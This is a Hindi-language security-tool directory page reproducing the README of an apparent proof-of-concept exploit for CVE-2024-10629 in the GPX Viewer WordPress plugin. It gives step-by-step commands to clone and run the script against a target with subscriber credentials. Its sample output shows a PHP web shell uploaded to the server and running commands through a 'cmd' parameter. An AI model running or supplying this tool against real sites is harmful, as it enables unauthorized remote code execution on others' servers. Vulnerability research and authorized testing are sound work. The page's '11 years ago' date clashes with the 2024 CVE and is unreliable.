Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - प्रमाणित (सदस्य+) मनमाना फ़ाइल निर्माण | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-10629
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - प्रमाणित (सदस्य+) मनमाना फ़ाइल निर्माण

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛠️ GPX Viewer एक्सप्लॉइट (CVE-2024-10629)

यह रिपॉजिटरी वर्डप्रेस के GPX Viewer प्लगइन के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो मनमानी फ़ाइल निर्माण (CVE-2024-10629) के लिए संवेदनशील है। यह कमजोरी प्रमाणित हमलावरों को सब्सक्राइबर-स्तर और उससे ऊपर की पहुंच के साथ प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें बनाने की अनुमति देती है, जो संभावित रूप से रिमोट कोड निष्पादन का कारण बन सकती है।

📝 CVE विवरण

  • CVE ID: CVE-2024-10629
  • प्रकाशित: 2024-11-13
  • अद्यतन: 2024-11-13
  • संवेदनशील प्लगइन: GPX Viewer <= 2.2.8
  • कमजोरी का प्रकार: प्रमाणित (सब्सक्राइबर+) मनमानी फ़ाइल निर्माण
  • स्कोर: 8.8 उच्च
  • गंभीरता: उच्च
  • संस्करण: 3.1
  • वेक्टर स्ट्रिंग: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

विवरण

GPX Viewer प्लगइन वर्डप्रेस के लिए gpxv_file_upload() फ़ंक्शन में क्षमता जांच और फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल निर्माण के लिए संवेदनशील है, जो सभी संस्करणों में 2.2.8 तक और शामिल है। यह प्रमाणित हमलावरों, सब्सक्राइबर-स्तर और उससे ऊपर की पहुंच के साथ, प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें बनाने में सक्षम बनाता है जो रिमोट कोड निष्पादन संभव बना सकता है।

🚀 सुविधाएँ

  • प्रदान किए गए उपयोगकर्ता नाम और पासवर्ड का उपयोग करके स्वचालित लॉगिन।
  • GPX Viewer प्लगइन संस्करण का सत्यापन।
  • सर्वर पर एक PHP शेल अपलोड करता है।
  • शेल के सफल अपलोड की पुष्टि करता है।
  • अपलोड किए गए शेल के माध्यम से सर्वर पर कमांड निष्पादित करता है।
  • 📚 उपयोग

    पूर्वापेक्षाएँ

    • Python 3.x
    • requests लाइब्रेरी

    एक्सप्लॉइट चलाना

    1. रिपॉजिटरी क्लोन करें:

      root@kitploit:~
      git clone https://github.com/Nxploited/CVE-2024-10629/
      cd CVE-2024-10629
      
    2. आवश्यक लाइब्रेरी स्थापित करें:

      root@kitploit:~
      pip install requests
      
    3. एक्सप्लॉइट चलाएं:

      root@kitploit:~
      python exploit.py -u <target_url> -un <username> -p <password>
      

      <target_url>, <username>, और <password> को उपयुक्त मानों से बदलें।

    उदाहरण

    root@kitploit:~
    python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
    

    आउटपुट

    • स्क्रिप्ट प्लगइन संस्करण आउटपुट करेगी और जांचेगी कि यह संवेदनशील है या नहीं।
    • फिर यह प्रदान की गई क्रेडेंशियल का उपयोग करके लॉग इन करेगी और शेल अपलोड करने का प्रयास करेगी।
    • सफल होने पर, यह शेल अपलोड की पुष्टि करेगी और एक नमूना कमांड (ls) निष्पादित करेगी।
    root@kitploit:~
    [+] WordPress plugin version: 2.2.8
    [+] Vulnerable version detected. Proceeding with exploitation...
    [+] Logged in successfully.
    [+] Shell uploaded. Checking shell...
    [+] Shell uploaded successfully.
    [+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
    [+] Command output:
    http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
    index.php
    wp-admin
    wp-content
    wp-includes
    ...
    

    उदाहरण कमांड

    • ls = फ़ाइलें दिखाएं
    • uname -a = सिस्टम जानकारी दिखाएं

    ⚠️ अस्वीकरण

    यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। इस एक्सप्लॉइट का अनधिकृत उपयोग उन प्रणालियों के विरुद्ध जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। इस रिपॉजिटरी के लेखक और योगदानकर्ता इस एक्सप्लॉइट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


    द्वारा: खालिद अलेनाज़ी (Nxploit)

    टूल डाउनलोड करें